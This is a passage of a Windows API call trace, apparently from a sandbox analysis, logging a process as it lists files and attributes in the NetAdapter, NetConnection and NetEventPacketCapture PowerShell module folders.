ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.289] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.289] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe06, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.290] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.290] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.290] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc82, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.290] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.psd1", cAlternateFileName="")) returned 1 [0177.291] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.291] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 0 [0177.291] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.292] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20 [0177.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.295] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0177.295] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0177.295] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.297] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.298] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.cdxml", cAlternateFileName="")) returned 1 [0177.298] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.format.ps1xml", cAlternateFileName="")) returned 1 [0177.298] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x791, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.types.ps1xml", cAlternateFileName="")) returned 1 [0177.298] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 1 [0177.298] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 0 [0177.298] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.299] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0177.300] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0177.300] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.301] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.301] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.cdxml", cAlternateFileName="")) returned 1 [0177.301] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.format.ps1xml", cAlternateFileName="")) returned 1 [0177.301] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x791, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.types.ps1xml", cAlternateFileName="")) returned 1 [0177.301] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 1 [0177.301] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.301] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.302] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0177.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.302] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.303] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0177.303] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0177.303] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.304] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.304] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.cdxml", cAlternateFileName="")) returned 1 [0177.304] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.format.ps1xml", cAlternateFileName="")) returned 1 [0177.304] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x791, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.types.ps1xml", cAlternateFileName="")) returned 1 [0177.304] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 1 [0177.304] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 0 [0177.304] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.305] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1")) returned 0x20 [0177.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.307] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0177.307] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0177.307] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.309] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.309] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.cdxml", cAlternateFileName="")) returned 1 [0177.310] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.format.ps1xml", cAlternateFileName="")) returned 1 [0177.310] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0177.310] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x150e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0177.310] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.cdxml", cAlternateFileName="")) returned 1 [0177.310] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: 